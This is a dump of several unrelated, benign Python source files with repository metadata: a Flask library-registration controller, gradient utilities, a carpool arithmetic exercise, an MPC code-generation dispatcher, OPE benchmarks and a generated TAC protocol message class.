            get_one(self._db, Library, short_name=library_short_name)
            or NO_SUCH_LIBRARY
        )

    def process_post(self, registration_class, do_get, do_post):
        """Attempt to register a library with a RemoteRegistry."""
        form = flask.request.form
        registry = self.look_up_registry(form.get("integration_id"))
        if isinstance(registry, ProblemDetail):
            return registry
        library = self.look_up_library(form.get("library_short_name"))
        if isinstance(library, ProblemDetail):
            return library
        stage = form.get("registration_stage") or Registration.TESTING_STAGE
        outcome = registration_class(registry, library).push(
            stage, self.url_for, do_get=do_get, do_post=do_post
        )
        if isinstance(outcome, ProblemDetail):
            return outcome
        return Response(str(_("Success")), 200)
| 37.71223 | 97 | 0.660816 | import json
import flask
from flask import Response
from flask_babel import lazy_gettext as _
from api.admin.problem_details import *
from api.registration.registry import Registration, RemoteRegistry
from core.model import ExternalIntegration, Library, get_one
from core.util.http import HTTP
from core.util.problem_detail import ProblemDetail
from . import SettingsController
class DiscoveryServiceLibraryRegistrationsController(SettingsController):
    """List the libraries registered with a specific RemoteRegistry, and
    allow the admin to register a library with a RemoteRegistry.

    :param registration_class: Mock class to use instead of Registration.
    """
    def __init__(self, manager):
        super(DiscoveryServiceLibraryRegistrationsController, self).__init__(manager)
        self.goal = ExternalIntegration.DISCOVERY_GOAL
    def process_discovery_service_library_registrations(
        self,
        registration_class=None,
        do_get=HTTP.debuggable_get,
        do_post=HTTP.debuggable_post,
    ):
        """Dispatch to the GET (list) or POST (register) handler after an admin check."""
        registration_class = registration_class or Registration
        self.require_system_admin()
        if flask.request.method == "GET":
            return self.process_get(do_get)
        else:
            return self.process_post(registration_class, do_get, do_post)
    def process_get(self, do_get=HTTP.debuggable_get):
        """List every discovery service with its registered libraries and
        each registration's status."""
        services = []
        for registry in RemoteRegistry.for_protocol_and_goal(
            self._db, ExternalIntegration.OPDS_REGISTRATION, self.goal
        ):
            result = registry.fetch_registration_document(do_get=do_get)
            if isinstance(result, ProblemDetail):
                # A ProblemDetail here doesn't mean the whole request is
                # ruined -- just that one of the discovery services isn't
                # working. Turn it into JSON for client-side handling.
                access_problem = json.loads(result.response[0])
                terms_of_service_link = terms_of_service_html = None
            else:
                access_problem = None
                terms_of_service_link, terms_of_service_html = result
            libraries = []
            for registration in registry.registrations:
                library_info = self.get_library_info(registration)
                if library_info:
                    libraries.append(library_info)
            services.append(
                dict(
                    id=registry.integration.id,
                    access_problem=access_problem,
                    terms_of_service_link=terms_of_service_link,
                    terms_of_service_html=terms_of_service_html,
                    libraries=libraries,
                )
            )
        return dict(library_registrations=services)
    def get_library_info(self, registration):
        """Summarize one registration: library short name plus, when set,
        the registration stage and status."""
        library = registration.library
        library_info = dict(short_name=library.short_name)
        status = registration.status_field.value
        stage_field = registration.stage_field.value
        if stage_field:
            library_info["stage"] = stage_field
        if status:
            library_info["status"] = status
        return library_info
    def look_up_registry(self, integration_id):
        """Find the RemoteRegistry the user is registering with; return
        MISSING_SERVICE if it does not exist."""
        registry = RemoteRegistry.for_integration_id(
            self._db, integration_id, self.goal
        )
        if not registry:
            return MISSING_SERVICE
        return registry
    def look_up_library(self, library_short_name):
        """Find the library being registered; return NO_SUCH_LIBRARY if absent."""
        library = get_one(self._db, Library, short_name=library_short_name)
        if not library:
            return NO_SUCH_LIBRARY
        return library
    def process_post(self, registration_class, do_get, do_post):
        """Attempt to register a library with a RemoteRegistry."""
        integration_id = flask.request.form.get("integration_id")
        library_short_name = flask.request.form.get("library_short_name")
        # Default to the testing stage when the form does not specify one.
        stage = (
            flask.request.form.get("registration_stage") or Registration.TESTING_STAGE
        )
        registry = self.look_up_registry(integration_id)
        if isinstance(registry, ProblemDetail):
            return registry
        library = self.look_up_library(library_short_name)
        if isinstance(library, ProblemDetail):
            return library
        registration = registration_class(registry, library)
        registered = registration.push(
            stage, self.url_for, do_get=do_get, do_post=do_post
        )
        if isinstance(registered, ProblemDetail):
            return registered
        return Response(str(_("Success")), 200)
| true | true |
1c3321ab02b21c65c4f5b04f4c9668d8d0636669 | 1,063 | py | Python | tf1x/schematic_utils/toy/util.py | dpaiton/DeepSparseCoding | 5ea01fa8770794df5e13743aa3f2d85297c27eb1 | [
"MIT"
] | 12 | 2017-04-27T17:19:31.000Z | 2021-11-07T03:37:59.000Z | tf1x/schematic_utils/toy/util.py | dpaiton/DeepSparseCoding | 5ea01fa8770794df5e13743aa3f2d85297c27eb1 | [
"MIT"
] | 12 | 2018-03-21T01:16:25.000Z | 2022-02-10T00:21:58.000Z | tf1x/schematic_utils/toy/util.py | dpaiton/DeepSparseCoding | 5ea01fa8770794df5e13743aa3f2d85297c27eb1 | [
"MIT"
] | 12 | 2017-02-01T19:49:57.000Z | 2021-12-08T03:16:58.000Z | from itertools import product
import autograd
import autograd.numpy as np
def orthogonalize(twovector):
    """Rotate a 2-vector 90 degrees counter-clockwise: (x, y) -> (-y, x)."""
    x, y = twovector[0], twovector[1]
    return np.asarray([-y, x])
def follow_grad(starting_point, f, lims=(0, 1), eps=1e-2):
    """Trace gradient ascent on ``f`` starting from ``starting_point``.

    Repeatedly steps by ``eps`` along ``autograd.grad(f)`` until the iterate
    leaves the box defined by ``lims`` (applied coordinate-wise) or the
    gradient norm effectively vanishes.

    Fix: the default for ``lims`` is now an immutable tuple instead of a
    mutable list (same values, avoids the shared-mutable-default pitfall).

    :param starting_point: initial point (array-like).
    :param f: scalar function differentiable by autograd.
    :param lims: lower/upper bound applied to every coordinate.
    :param eps: step size.
    :return: visited points as an array of shape (steps, dim).
    """
    grad = autograd.grad(f)
    # Hoist the loop-invariant bounds out of the loop.
    upper, lower = max(lims), min(lims)
    points = [starting_point]
    point = points[-1]
    while (max(point) < upper) & (min(point) > lower):
        update = grad(point)
        if np.linalg.norm(update) < 1e-10:
            # Effectively at a stationary point: stop instead of looping forever.
            break
        points.append(point + eps * update)
        point = points[-1]
    return np.asarray(points)
def normalize_dict(dictionary):
    """Return a copy of the dictionary matrix with every column scaled to unit Euclidean norm."""
    # dictionary.T iterates columns; divide each by its norm and transpose back.
    unit_columns = [column / np.linalg.norm(column) for column in dictionary.T]
    return np.asarray(unit_columns).T
def normalize(dictionary_element):
    """Scale a dictionary element (vector) to unit Euclidean norm."""
    length = np.linalg.norm(dictionary_element)
    return dictionary_element / length
def compute_grads(f, xlims, ylims, xN, yN):
    """Evaluate ``autograd.grad(f)`` on an xN-by-yN grid spanning xlims x ylims.

    Returns the list of gradients and the matching list of grid points.
    """
    grid_x = np.linspace(*xlims, num=xN)
    grid_y = np.linspace(*ylims, num=yN)
    locations = list(product(grid_x, grid_y))
    # Build the gradient function once and reuse it for every grid point.
    gradient = autograd.grad(f)
    grads = [gradient(location) for location in locations]
    return grads, locations
| 24.159091 | 66 | 0.66604 | from itertools import product
import autograd
import autograd.numpy as np
def orthogonalize(twovector):
    """Rotate a 2-vector 90 degrees counter-clockwise: (x, y) -> (-y, x)."""
    return np.asarray([-twovector[1], twovector[0]])
def follow_grad(starting_point, f, lims=[0, 1], eps=1e-2):
    """Trace gradient ascent on ``f`` from ``starting_point`` until the iterate
    leaves the coordinate-wise box given by ``lims`` or the gradient vanishes."""
    grad = autograd.grad(f)
    points = [starting_point]
    point = points[-1]
    while (max(point) < max(lims)) & (min(point) > min(lims)):
        update = grad(point)
        if np.linalg.norm(update) < 1e-10:
            # Effectively stationary: stop instead of looping forever.
            break
        points.append(point + eps * update)
        point = points[-1]
    return np.asarray(points)
def normalize_dict(dictionary):
    """Return the dictionary matrix with every column scaled to unit norm."""
    normalized_dict_elems = [
        normalize(dict_elem) for dict_elem in dictionary.T]
    return np.asarray(normalized_dict_elems).T
def normalize(dictionary_element):
    """Scale a dictionary element (vector) to unit Euclidean norm."""
    return dictionary_element / np.linalg.norm(dictionary_element)
def compute_grads(f, xlims, ylims, xN, yN):
    """Evaluate ``autograd.grad(f)`` on an xN-by-yN grid spanning xlims x ylims."""
    xs = np.linspace(*xlims, num=xN)
    ys = np.linspace(*ylims, num=yN)
    grads = [autograd.grad(f)(point) for point in product(xs, ys)]
    return grads, list(product(xs, ys))
| true | true |
1c3321d53937d70c3138dce8331d00032cd770e2 | 569 | py | Python | ex4.py | Tobijoe/LPTHW | 12f3e412c339f51828c909a94fd55ef6e7eb8b5b | [
"MIT"
] | null | null | null | ex4.py | Tobijoe/LPTHW | 12f3e412c339f51828c909a94fd55ef6e7eb8b5b | [
"MIT"
] | null | null | null | ex4.py | Tobijoe/LPTHW | 12f3e412c339f51828c909a94fd55ef6e7eb8b5b | [
"MIT"
] | null | null | null | cars = 100
# NOTE: `cars` (total fleet size, 100) is assigned immediately above this block.
space_in_a_car = 4.0
drivers = 30
passengers = 90
# Cars without a driver stay parked.
cars_not_driven = cars - drivers
cars_driven = drivers
# Total seats across all driven cars (float because space_in_a_car is 4.0).
carpool_capacity = cars_driven * space_in_a_car
average_passengers_per_car = passengers / cars_driven
print ("There are", cars, "cars available.")
print ("There are only", drivers, "drivers available.")
print ("There will be", cars_not_driven, "empty cars today.")
print ("We can transport", carpool_capacity, "people today.")
print ("We have", passengers, "to carpool today.")
print ("We need to put about", average_passengers_per_car, "in each car") | 37.933333 | 73 | 0.752197 | cars = 100
# NOTE: `cars` (total fleet size, 100) is assigned immediately above this block.
space_in_a_car = 4.0
drivers = 30
passengers = 90
# Cars without a driver stay parked.
cars_not_driven = cars - drivers
cars_driven = drivers
# Total seats across all driven cars (float because space_in_a_car is 4.0).
carpool_capacity = cars_driven * space_in_a_car
average_passengers_per_car = passengers / cars_driven
print ("There are", cars, "cars available.")
print ("There are only", drivers, "drivers available.")
print ("There will be", cars_not_driven, "empty cars today.")
print ("We can transport", carpool_capacity, "people today.")
print ("We have", passengers, "to carpool today.")
print ("We need to put about", average_passengers_per_car, "in each car") | true | true |
1c3321f2fce232ea67552cbefce40cb955c25c68 | 5,869 | py | Python | conclave/__init__.py | byzhang/conclave | ddc6a39df2c577d1f3cd2c969d67a7760f4b596f | [
"MIT"
] | 69 | 2018-02-28T13:25:24.000Z | 2022-03-17T00:51:43.000Z | conclave/__init__.py | byzhang/conclave | ddc6a39df2c577d1f3cd2c969d67a7760f4b596f | [
"MIT"
] | 5 | 2018-01-29T16:57:19.000Z | 2020-06-15T15:06:57.000Z | conclave/__init__.py | byzhang/conclave | ddc6a39df2c577d1f3cd2c969d67a7760f4b596f | [
"MIT"
] | 25 | 2018-01-23T22:09:11.000Z | 2022-01-16T11:26:44.000Z | import conclave.comp as comp
import conclave.dag as condag
import conclave.partition as part
from conclave.codegen import scotch
from conclave.codegen.python import PythonCodeGen
from conclave.codegen.sharemind import SharemindCodeGen
from conclave.codegen.spark import SparkCodeGen
from conclave.codegen.oblivc import OblivcCodeGen
from conclave.codegen.jiff import JiffCodeGen
from conclave.codegen.single_party import SinglePartyCodegen
from conclave.config import CodeGenConfig
from conclave.dispatch import dispatch_all
from conclave.net import SalmonPeer
from conclave.net import setup_peer
def generate_code(protocol: callable, cfg: CodeGenConfig, mpc_frameworks: list,
                  local_frameworks: list, apply_optimizations: bool = True):
    """
    Apply optimization rewrite passes to the protocol, partition the resulting
    dag, and generate backend-specific code for each sub-dag.

    :param protocol: protocol to compile
    :param cfg: conclave configuration
    :param mpc_frameworks: available mpc backend frameworks
    :param local_frameworks: available local-processing backend frameworks
    :param apply_optimizations: flag indicating if optimization rewrite passes should be applied to condag
    :return: queue of job objects to be executed by dispatcher
    """
    dag = condag.OpDag(protocol())
    job_queue = []
    single_party_modes = {"single-party-spark", "single-party-python"}
    if not single_party_modes.intersection(mpc_frameworks):
        # Multi-party path: currently only one local and one mpc framework allowed.
        assert len(mpc_frameworks) == 1 and len(local_frameworks) == 1
        if apply_optimizations:
            dag = comp.rewrite_dag(dag, cfg)
        # Partition into sub-dags, each bound to a specific framework.
        partitions = part.heupart(dag, mpc_frameworks, local_frameworks)
        for job_num, (framework, sub_dag, stored_with) in enumerate(partitions):
            print(job_num, framework)
            if framework == "sharemind":
                code_gen = SharemindCodeGen(cfg, sub_dag, cfg.pid)
                label = "sharemind"
            elif framework == "spark":
                code_gen = SparkCodeGen(cfg, sub_dag)
                label = "spark"
            elif framework == "python":
                code_gen = PythonCodeGen(cfg, sub_dag)
                label = "python"
            elif framework == "obliv-c":
                code_gen = OblivcCodeGen(cfg, sub_dag, cfg.pid)
                label = "oblivc"
            elif framework == "jiff":
                code_gen = JiffCodeGen(cfg, sub_dag, cfg.pid)
                label = "jiff"
            else:
                raise Exception("Unknown framework: " + framework)
            job_name = "{}-{}-job-{}".format(cfg.name, label, job_num)
            job = code_gen.generate(job_name, cfg.output_path)
            job_queue.append(job)
            # TODO: this probably doesn't belong here
            # Parties that don't hold the sub-dag's data skip this job.
            if cfg.pid not in stored_with:
                job.skip = True
    else:
        # Single-party path: exactly one framework expected.
        assert len(mpc_frameworks) == 1
        chosen = mpc_frameworks[0]
        if chosen == "single-party-spark":
            job = SinglePartyCodegen(cfg, dag, "spark").generate(
                "{}-spark-job-0".format(cfg.name), cfg.output_path
            )
            job_queue.append(job)
        elif chosen == "single-party-python":
            job = SinglePartyCodegen(cfg, dag, "python").generate(
                "{}-python-job-0".format(cfg.name), cfg.output_path
            )
            job_queue.append(job)
        else:
            raise Exception("Unknown framework: {}".format(chosen))
    return job_queue
def dispatch_jobs(job_queue: list, conclave_config: CodeGenConfig, time_dispatch: bool = False):
    """
    Dispatch jobs to their respective backends.

    :param job_queue: jobs to dispatch
    :param conclave_config: conclave configuration
    :param time_dispatch: record the execution time of dispatch if true
    """
    networked_peer = None
    if len(conclave_config.all_pids) > 1:
        # More than one party in the protocol: a networked peer is required.
        networked_peer = _setup_networked_peer(conclave_config.network_config)
    if not time_dispatch:
        dispatch_all(conclave_config, networked_peer, job_queue)
        return
    # TODO use timeit
    import time
    import datetime
    started = time.time()
    dispatch_all(conclave_config, networked_peer, job_queue)
    elapsed = time.time() - started
    pretty = datetime.timedelta(milliseconds=(elapsed * 1000))
    print("TIMED", conclave_config.name, round(elapsed, 3), pretty)
    # Append the measurement so repeated runs accumulate in one CSV.
    with open("timing_results.csv", "a+") as time_f:
        row = ",".join([conclave_config.name, str(round(elapsed, 3)), str(pretty)])
        time_f.write(row + "\n")
def generate_and_dispatch(protocol: callable, conclave_config: CodeGenConfig, mpc_frameworks: list,
                          local_frameworks: list, apply_optimizations: bool = True):
    """Generate code for the protocol and immediately dispatch the resulting jobs."""
    jobs = generate_code(
        protocol, conclave_config, mpc_frameworks, local_frameworks, apply_optimizations
    )
    dispatch_jobs(jobs, conclave_config)
def _setup_networked_peer(network_config):
    # Create and return a networked peer from the given network configuration.
    return setup_peer(network_config)
| 41.041958 | 114 | 0.671324 | import conclave.comp as comp
import conclave.dag as condag
import conclave.partition as part
from conclave.codegen import scotch
from conclave.codegen.python import PythonCodeGen
from conclave.codegen.sharemind import SharemindCodeGen
from conclave.codegen.spark import SparkCodeGen
from conclave.codegen.oblivc import OblivcCodeGen
from conclave.codegen.jiff import JiffCodeGen
from conclave.codegen.single_party import SinglePartyCodegen
from conclave.config import CodeGenConfig
from conclave.dispatch import dispatch_all
from conclave.net import SalmonPeer
from conclave.net import setup_peer
def generate_code(protocol: callable, cfg: CodeGenConfig, mpc_frameworks: list,
                  local_frameworks: list, apply_optimizations: bool = True):
    """Apply optimization passes to the protocol, partition the resulting dag,
    and generate backend-specific code for each sub-dag.

    :param protocol: protocol to compile
    :param cfg: conclave configuration
    :param mpc_frameworks: available mpc backend frameworks
    :param local_frameworks: available local-processing backend frameworks
    :param apply_optimizations: whether to run rewrite passes on the dag
    :return: queue of job objects to be executed by the dispatcher
    """
    dag = condag.OpDag(protocol())
    job_queue = []
    if "single-party-spark" not in set(mpc_frameworks) and "single-party-python" not in set(mpc_frameworks):
        # Multi-party path: only one local and one mpc framework allowed.
        assert len(mpc_frameworks) == 1 and len(local_frameworks) == 1
        if apply_optimizations:
            dag = comp.rewrite_dag(dag, cfg)
        # Partition into sub-dags, each bound to a specific framework.
        mapping = part.heupart(dag, mpc_frameworks, local_frameworks)
        for job_num, (framework, sub_dag, stored_with) in enumerate(mapping):
            print(job_num, framework)
            if framework == "sharemind":
                name = "{}-sharemind-job-{}".format(cfg.name, job_num)
                job = SharemindCodeGen(cfg, sub_dag, cfg.pid).generate(name, cfg.output_path)
                job_queue.append(job)
            elif framework == "spark":
                name = "{}-spark-job-{}".format(cfg.name, job_num)
                job = SparkCodeGen(cfg, sub_dag).generate(name, cfg.output_path)
                job_queue.append(job)
            elif framework == "python":
                name = "{}-python-job-{}".format(cfg.name, job_num)
                job = PythonCodeGen(cfg, sub_dag).generate(name, cfg.output_path)
                job_queue.append(job)
            elif framework == "obliv-c":
                name = "{}-oblivc-job-{}".format(cfg.name, job_num)
                job = OblivcCodeGen(cfg, sub_dag, cfg.pid).generate(name, cfg.output_path)
                job_queue.append(job)
            elif framework == "jiff":
                name = "{}-jiff-job-{}".format(cfg.name, job_num)
                job = JiffCodeGen(cfg, sub_dag, cfg.pid).generate(name, cfg.output_path)
                job_queue.append(job)
            else:
                raise Exception("Unknown framework: " + framework)
            # Parties that don't hold the sub-dag's data skip this job.
            if cfg.pid not in stored_with:
                job.skip = True
    else:
        # Single-party path: exactly one framework expected.
        assert len(mpc_frameworks) == 1
        if mpc_frameworks[0] == "single-party-spark":
            name = "{}-spark-job-0".format(cfg.name)
            job = SinglePartyCodegen(cfg, dag, "spark").generate(name, cfg.output_path)
            job_queue.append(job)
        elif mpc_frameworks[0] == "single-party-python":
            name = "{}-python-job-0".format(cfg.name)
            job = SinglePartyCodegen(cfg, dag, "python").generate(name, cfg.output_path)
            job_queue.append(job)
        else:
            raise Exception("Unknown framework: {}".format(mpc_frameworks[0]))
    return job_queue
def dispatch_jobs(job_queue: list, conclave_config: CodeGenConfig, time_dispatch: bool = False):
    """Dispatch jobs to their respective backends, optionally timing the run.

    :param job_queue: jobs to dispatch
    :param conclave_config: conclave configuration
    :param time_dispatch: record and log the execution time if true
    """
    networked_peer = None
    # if more than one party is involved in the protocol, we need a networked peer
    if len(conclave_config.all_pids) > 1:
        networked_peer = _setup_networked_peer(conclave_config.network_config)
    if time_dispatch:
        # TODO use timeit
        import time
        import datetime
        start_time = time.time()
        dispatch_all(conclave_config, networked_peer, job_queue)
        elapsed_time = time.time() - start_time
        formatted_time = datetime.timedelta(milliseconds=(elapsed_time * 1000))
        print("TIMED", conclave_config.name, round(elapsed_time, 3), formatted_time)
        # Append the measurement so repeated runs accumulate in one CSV.
        with open("timing_results.csv", "a+") as time_f:
            out = ",".join([conclave_config.name, str(round(elapsed_time, 3)), str(formatted_time)])
            time_f.write(out + "\n")
    else:
        dispatch_all(conclave_config, networked_peer, job_queue)
def generate_and_dispatch(protocol: callable, conclave_config: CodeGenConfig, mpc_frameworks: list,
                          local_frameworks: list, apply_optimizations: bool = True):
    """Generate code for the protocol and immediately dispatch the resulting jobs."""
    job_queue = generate_code(protocol, conclave_config, mpc_frameworks, local_frameworks, apply_optimizations)
    dispatch_jobs(job_queue, conclave_config)
def _setup_networked_peer(network_config):
    # Create and return a networked peer from the given network configuration.
    return setup_peer(network_config)
| true | true |
1c332227a6194c8234094026d9cfbccdd8d11330 | 570 | py | Python | benchmark/test_ope.py | MartinHeinz/IoT-Cloud | 2e6fddcfe2624862c9351759334a6655a896e8c7 | [
"MIT"
] | 14 | 2019-11-17T23:49:20.000Z | 2022-02-04T23:28:45.000Z | benchmark/test_ope.py | MartinHeinz/IoT-Cloud | 2e6fddcfe2624862c9351759334a6655a896e8c7 | [
"MIT"
] | 3 | 2019-12-02T18:26:11.000Z | 2021-04-30T20:46:06.000Z | benchmark/test_ope.py | MartinHeinz/IoT-Cloud | 2e6fddcfe2624862c9351759334a6655a896e8c7 | [
"MIT"
] | 4 | 2018-12-28T13:41:44.000Z | 2020-09-13T14:14:06.000Z | from random import randint
import pytest
from pyope.ope import OPE
from client.crypto_utils import instantiate_ope_cipher
@pytest.fixture(scope="module", autouse=True)
def cipher():
    """Module-scoped OPE cipher built from a freshly generated random key."""
    random_key = OPE.generate_key()
    c = instantiate_ope_cipher(random_key)
    return c
def test_ope_encrypt(benchmark, cipher):
    """Benchmark OPE encryption of a random integer (100 iterations x 100 rounds)."""
    benchmark.pedantic(cipher.encrypt, args=(randint(0, 100000),), iterations=100, rounds=100)
def test_ope_decrypt(benchmark, cipher):
    """Benchmark OPE decryption of a freshly encrypted random integer."""
    benchmark.pedantic(cipher.decrypt, args=(cipher.encrypt(randint(0, 100000)),), iterations=100, rounds=100)
| 25.909091 | 110 | 0.764912 | from random import randint
import pytest
from pyope.ope import OPE
from client.crypto_utils import instantiate_ope_cipher
@pytest.fixture(scope="module", autouse=True)
def cipher():
    """Module-scoped OPE cipher built from a freshly generated random key."""
    random_key = OPE.generate_key()
    c = instantiate_ope_cipher(random_key)
    return c
def test_ope_encrypt(benchmark, cipher):
    """Benchmark OPE encryption of a random integer (100 iterations x 100 rounds)."""
    benchmark.pedantic(cipher.encrypt, args=(randint(0, 100000),), iterations=100, rounds=100)
def test_ope_decrypt(benchmark, cipher):
    """Benchmark OPE decryption of a freshly encrypted random integer."""
    benchmark.pedantic(cipher.decrypt, args=(cipher.encrypt(randint(0, 100000)),), iterations=100, rounds=100)
| true | true |
1c3322701550af76c8751e686cfd254af5a7c22f | 34,040 | py | Python | packages/fetchai/protocols/tac/message.py | devjsc/agents-aea | 872f7b76cbcd33b6c809905c68681790bb93ff2f | [
"Apache-2.0"
] | null | null | null | packages/fetchai/protocols/tac/message.py | devjsc/agents-aea | 872f7b76cbcd33b6c809905c68681790bb93ff2f | [
"Apache-2.0"
] | null | null | null | packages/fetchai/protocols/tac/message.py | devjsc/agents-aea | 872f7b76cbcd33b6c809905c68681790bb93ff2f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2021 fetchai
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains tac's message definition."""
import logging
from typing import Any, Dict, Optional, Set, Tuple, cast
from aea.configurations.base import PublicId
from aea.exceptions import AEAEnforceError, enforce
from aea.protocols.base import Message
from packages.fetchai.protocols.tac.custom_types import ErrorCode as CustomErrorCode
_default_logger = logging.getLogger("aea.packages.fetchai.protocols.tac.message")
DEFAULT_BODY_SIZE = 4
class TacMessage(Message):
    """The tac protocol implements the messages an AEA needs to participate in the TAC."""
    # Identifiers under which this protocol package/specification is published.
    protocol_id = PublicId.from_str("fetchai/tac:0.15.0")
    protocol_specification_id = PublicId.from_str("fetchai/tac:1.0.0")
    # Re-exported so users can reference TacMessage.ErrorCode directly.
    ErrorCode = CustomErrorCode
    class Performative(Message.Performative):
        """Performatives for the tac protocol."""
        CANCELLED = "cancelled"
        GAME_DATA = "game_data"
        REGISTER = "register"
        TAC_ERROR = "tac_error"
        TRANSACTION = "transaction"
        TRANSACTION_CONFIRMATION = "transaction_confirmation"
        UNREGISTER = "unregister"
        def __str__(self) -> str:
            """Get the string representation."""
            return str(self.value)
    # The set of performative names accepted by this protocol; must mirror
    # the Performative enum values above.
    _performatives = {
        "cancelled",
        "game_data",
        "register",
        "tac_error",
        "transaction",
        "transaction_confirmation",
        "unregister",
    }
    __slots__: Tuple[str, ...] = tuple()
    class _SlotsCls:
        # Names of every field a TacMessage body may carry; accessed via the
        # property accessors defined on TacMessage below.
        __slots__ = (
            "agent_addr_to_name",
            "agent_name",
            "amount_by_currency_id",
            "counterparty_address",
            "counterparty_signature",
            "currency_id_to_name",
            "dialogue_reference",
            "error_code",
            "exchange_params_by_currency_id",
            "fee_by_currency_id",
            "good_id_to_name",
            "info",
            "ledger_id",
            "message_id",
            "nonce",
            "performative",
            "quantities_by_good_id",
            "sender_address",
            "sender_signature",
            "target",
            "transaction_id",
            "utility_params_by_good_id",
            "version_id",
        )
    def __init__(
        self,
        performative: Performative,
        dialogue_reference: Tuple[str, str] = ("", ""),
        message_id: int = 1,
        target: int = 0,
        **kwargs: Any,
    ):
        """
        Initialise an instance of TacMessage.
        :param message_id: the message id.
        :param dialogue_reference: the dialogue reference.
        :param target: the message target.
        :param performative: the message performative.
        :param kwargs: performative-specific contents, passed through to the base class.
        """
        # The performative is normalized through the enum so plain strings are accepted.
        super().__init__(
            dialogue_reference=dialogue_reference,
            message_id=message_id,
            target=target,
            performative=TacMessage.Performative(performative),
            **kwargs,
        )
    # --- Envelope accessors (fields present on every message). Each accessor
    # calls enforce() to reject access when the field is unset (presumably
    # raising AEAEnforceError -- see aea.exceptions).
    @property
    def valid_performatives(self) -> Set[str]:
        """Get valid performatives."""
        return self._performatives
    @property
    def dialogue_reference(self) -> Tuple[str, str]:
        """Get the dialogue_reference of the message."""
        enforce(self.is_set("dialogue_reference"), "dialogue_reference is not set.")
        return cast(Tuple[str, str], self.get("dialogue_reference"))
    @property
    def message_id(self) -> int:
        """Get the message_id of the message."""
        enforce(self.is_set("message_id"), "message_id is not set.")
        return cast(int, self.get("message_id"))
    @property
    def performative(self) -> Performative:  # type: ignore # noqa: F821
        """Get the performative of the message."""
        enforce(self.is_set("performative"), "performative is not set.")
        return cast(TacMessage.Performative, self.get("performative"))
    @property
    def target(self) -> int:
        """Get the target of the message."""
        enforce(self.is_set("target"), "target is not set.")
        return cast(int, self.get("target"))
    # --- Performative-specific content accessors (part 1). Each accessor
    # enforces that the field is set before returning it.
    @property
    def agent_addr_to_name(self) -> Dict[str, str]:
        """Get the 'agent_addr_to_name' content from the message."""
        enforce(
            self.is_set("agent_addr_to_name"),
            "'agent_addr_to_name' content is not set.",
        )
        return cast(Dict[str, str], self.get("agent_addr_to_name"))
    @property
    def agent_name(self) -> str:
        """Get the 'agent_name' content from the message."""
        enforce(self.is_set("agent_name"), "'agent_name' content is not set.")
        return cast(str, self.get("agent_name"))
    @property
    def amount_by_currency_id(self) -> Dict[str, int]:
        """Get the 'amount_by_currency_id' content from the message."""
        enforce(
            self.is_set("amount_by_currency_id"),
            "'amount_by_currency_id' content is not set.",
        )
        return cast(Dict[str, int], self.get("amount_by_currency_id"))
    @property
    def counterparty_address(self) -> str:
        """Get the 'counterparty_address' content from the message."""
        enforce(
            self.is_set("counterparty_address"),
            "'counterparty_address' content is not set.",
        )
        return cast(str, self.get("counterparty_address"))
    @property
    def counterparty_signature(self) -> str:
        """Get the 'counterparty_signature' content from the message."""
        enforce(
            self.is_set("counterparty_signature"),
            "'counterparty_signature' content is not set.",
        )
        return cast(str, self.get("counterparty_signature"))
    @property
    def currency_id_to_name(self) -> Dict[str, str]:
        """Get the 'currency_id_to_name' content from the message."""
        enforce(
            self.is_set("currency_id_to_name"),
            "'currency_id_to_name' content is not set.",
        )
        return cast(Dict[str, str], self.get("currency_id_to_name"))
    @property
    def error_code(self) -> CustomErrorCode:
        """Get the 'error_code' content from the message."""
        enforce(self.is_set("error_code"), "'error_code' content is not set.")
        return cast(CustomErrorCode, self.get("error_code"))
    @property
    def exchange_params_by_currency_id(self) -> Dict[str, float]:
        """Get the 'exchange_params_by_currency_id' content from the message."""
        enforce(
            self.is_set("exchange_params_by_currency_id"),
            "'exchange_params_by_currency_id' content is not set.",
        )
        return cast(Dict[str, float], self.get("exchange_params_by_currency_id"))
    # --- Performative-specific content accessors (part 2).
    @property
    def fee_by_currency_id(self) -> Dict[str, int]:
        """Get the 'fee_by_currency_id' content from the message."""
        enforce(
            self.is_set("fee_by_currency_id"),
            "'fee_by_currency_id' content is not set.",
        )
        return cast(Dict[str, int], self.get("fee_by_currency_id"))
    @property
    def good_id_to_name(self) -> Dict[str, str]:
        """Get the 'good_id_to_name' content from the message."""
        enforce(self.is_set("good_id_to_name"), "'good_id_to_name' content is not set.")
        return cast(Dict[str, str], self.get("good_id_to_name"))
    @property
    def info(self) -> Optional[Dict[str, str]]:
        """Get the 'info' content from the message."""
        # Unlike the other contents, 'info' is optional: no enforce() check,
        # and None is returned when it is unset.
        return cast(Optional[Dict[str, str]], self.get("info"))
    @property
    def ledger_id(self) -> str:
        """Get the 'ledger_id' content from the message."""
        enforce(self.is_set("ledger_id"), "'ledger_id' content is not set.")
        return cast(str, self.get("ledger_id"))
    @property
    def nonce(self) -> str:
        """Get the 'nonce' content from the message."""
        enforce(self.is_set("nonce"), "'nonce' content is not set.")
        return cast(str, self.get("nonce"))
    @property
    def quantities_by_good_id(self) -> Dict[str, int]:
        """Get the 'quantities_by_good_id' content from the message."""
        enforce(
            self.is_set("quantities_by_good_id"),
            "'quantities_by_good_id' content is not set.",
        )
        return cast(Dict[str, int], self.get("quantities_by_good_id"))
    @property
    def sender_address(self) -> str:
        """Get the 'sender_address' content from the message."""
        enforce(self.is_set("sender_address"), "'sender_address' content is not set.")
        return cast(str, self.get("sender_address"))
    @property
    def sender_signature(self) -> str:
        """Get the 'sender_signature' content from the message."""
        enforce(
            self.is_set("sender_signature"), "'sender_signature' content is not set."
        )
        return cast(str, self.get("sender_signature"))
    @property
    def transaction_id(self) -> str:
        """Get the 'transaction_id' content from the message."""
        enforce(self.is_set("transaction_id"), "'transaction_id' content is not set.")
        return cast(str, self.get("transaction_id"))
@property
def utility_params_by_good_id(self) -> Dict[str, float]:
"""Get the 'utility_params_by_good_id' content from the message."""
enforce(
self.is_set("utility_params_by_good_id"),
"'utility_params_by_good_id' content is not set.",
)
return cast(Dict[str, float], self.get("utility_params_by_good_id"))
@property
def version_id(self) -> str:
"""Get the 'version_id' content from the message."""
